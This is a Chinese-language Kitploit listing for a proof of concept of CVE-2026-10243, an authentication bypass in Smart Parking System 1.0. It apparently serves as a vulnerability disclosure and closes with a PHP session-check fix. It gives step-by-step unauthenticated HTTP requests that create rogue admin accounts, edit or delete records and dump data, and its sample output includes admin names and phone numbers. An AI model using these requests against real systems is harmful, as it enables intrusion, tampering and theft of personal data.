Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-10243-AUTH — 概念验证,演示了 Smart Parking System 1.0 中无需身份验证即可访问关键管理员功能,从而允许创建账户、篡改数据以及泄露个人身份信息(PII)。 | Kitploit
工具/GitHubGitHub/xmyronn/cve-2026-10243-auth
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试身份验证
GitHubxmyronn/cve-2026-10243-auth

CVE-2026-10243-AUTH

概念验证,演示了 Smart Parking System 1.0 中无需身份验证即可访问关键管理员功能,从而允许创建账户、篡改数据以及泄露个人身份信息(PII)。

查看仓库
54个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Smart Parking System 1.0 - 未授权访问关键管理员功能

漏洞信息

字段详情
产品Smart Parking System
厂商code-projects.org
版本1.0
漏洞类别关键功能缺少身份验证(CWE-306)
CVE ID待定
CVSS 评分9.8 严重(AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
所需身份验证无
受影响文件attendant.php、edit.php、basic_table.php、basic_table2.php、admin_request.php

描述

code-projects.org 开发的 Smart Parking System 1.0 未能在多个仅限管理员访问的端点上强制执行身份验证。未认证的远程攻击者无需会话 Cookie 即可直接访问这些端点,并执行特权操作,包括创建管理员账户、编辑和删除停车记录,以及查看所有客户 PII 和预订数据。

利用此漏洞无需任何凭据、会话令牌,也无需任何合法用户的交互。


攻击链概述

root@kitploit:~
无需凭据 / 无需会话
        ↓
直接向管理员端点发送 GET 请求
        ↓
attendant.php     → 创建恶意管理员账户
edit.php          → 读取并覆盖任意停车记录
basic_table.php   → 删除任意停车记录
basic_table2.php  → 导出所有管理员 PII
admin_request.php → 导出所有客户邮箱和预订数据
        ↓
完整管理员功能被攻陷

分步概念验证

步骤 1 — 确认未认证状态

打开一个无 Cookie 的全新浏览器会话。导航至应用程序根目录。页面显示登录页面,确认当前不存在活动会话:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE/ HTTP/1.1
Host: 192.168.0.9

步骤 2 — 访问管理员创建面板(无需认证)

直接导航至管理员注册端点:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE/attendant.php HTTP/1.1
Host: 192.168.0.9

结果: 完整的"添加停车管理员详细信息"表单加载,包含名字、姓氏、手机号码、街道、用户名和密码字段。攻击者可以注册一个具有系统访问权限的恶意管理员账户。


步骤 3 — 读取和修改停车记录(无需认证)

直接导航至停车记录编辑端点:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE//edit.php?edit=5 HTTP/1.1
Host: 192.168.0.9

结果: "更新停车详情"表单加载并预填充了实时数据库值:

root@kitploit:~
城市:   Mombasa
街道: Tudor
车位:  150
费用:   500

攻击者可以覆盖任意字段并提交,将更改直接持久化到数据库。


步骤 4 — 删除停车记录(无需认证)

直接向删除端点发送 GET 请求:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE/basic_table.php?delete=4 HTTP/1.1
Host: 192.168.0.9

结果: 应用程序响应:

root@kitploit:~
停车记录删除成功

该记录在数据库中被永久销毁。无需身份验证、无需 CSRF 令牌、也无需确认提示。


步骤 5 — 导出所有停车管理员(无需认证)

直接导航至管理员列表端点:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE//basic_table2.php HTTP/1.1
Host: 192.168.0.9

结果: 返回完整的管理员名册,包括姓名、手机号码和分配的街道:

root@kitploit:~
karis  kelvin  070824555  msa
king   doshi   0708009360 Nairobi
james  peter   0708009360 vol
tset   test    0708009360 tset

步骤 6 — 导出所有客户预订数据(无需认证)

直接导航至管理员预订请求端点:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE//admin_request.php HTTP/1.1
Host: 192.168.0.9

结果: 返回所有客户预订记录,包括邮箱、车位、小时数和费用:

root@kitploit:~
[email protected]   slots:4  hours:2  cost:4000  status:requested
[email protected]   slots:1  hours:6  cost:1200  status:Completed
[email protected]    slots:1  hours:2  cost:1000  status:requested
[email protected]       slots:1  hours:1  cost:500   status:requested
[email protected]        slots:1  hours:1  cost:500   status:requested
[email protected]    slots:1  hours:1  cost:500   status:requested
[email protected]    slots:1  hours:3  cost:0     status:requested
[email protected]       slots:1  hours:2  cost:1000  status:requested

影响

  • 完整管理员面板访问权限 — 零凭据即可访问所有特权功能
  • 数据销毁 — 任意停车记录可被永久删除
  • 数据篡改 — 任意停车记录可被修改
  • 权限提升 — 可创建具有系统登录权限的恶意管理员账户
  • PII 泄露 — 所有客户邮箱和预订历史被窃取
  • 管理员数据泄露 — 完整名册(包括姓名和电话号码)被暴露

受影响文件摘要


修复建议

在每个面向管理员的 PHP 文件顶部添加会话身份验证检查:

root@kitploit:~
session_start();
if (!isset($_SESSION['admin']) || $_SESSION['admin'] !== true) {
    header("Location: index.php");
    exit();
}

参考

  • 厂商主页
  • CWE-306:关键功能缺少身份验证
  • OWASP:访问控制失效

发现者

  • 研究人员: Imad Alvi
下载工具
文件漏洞
attendant.php未认证的管理员账户创建
edit.php未认证的停车记录读写访问
basic_table.php未认证的停车记录删除
basic_table2.php未认证访问完整管理员 PII
admin_request.php未认证访问所有客户预订数据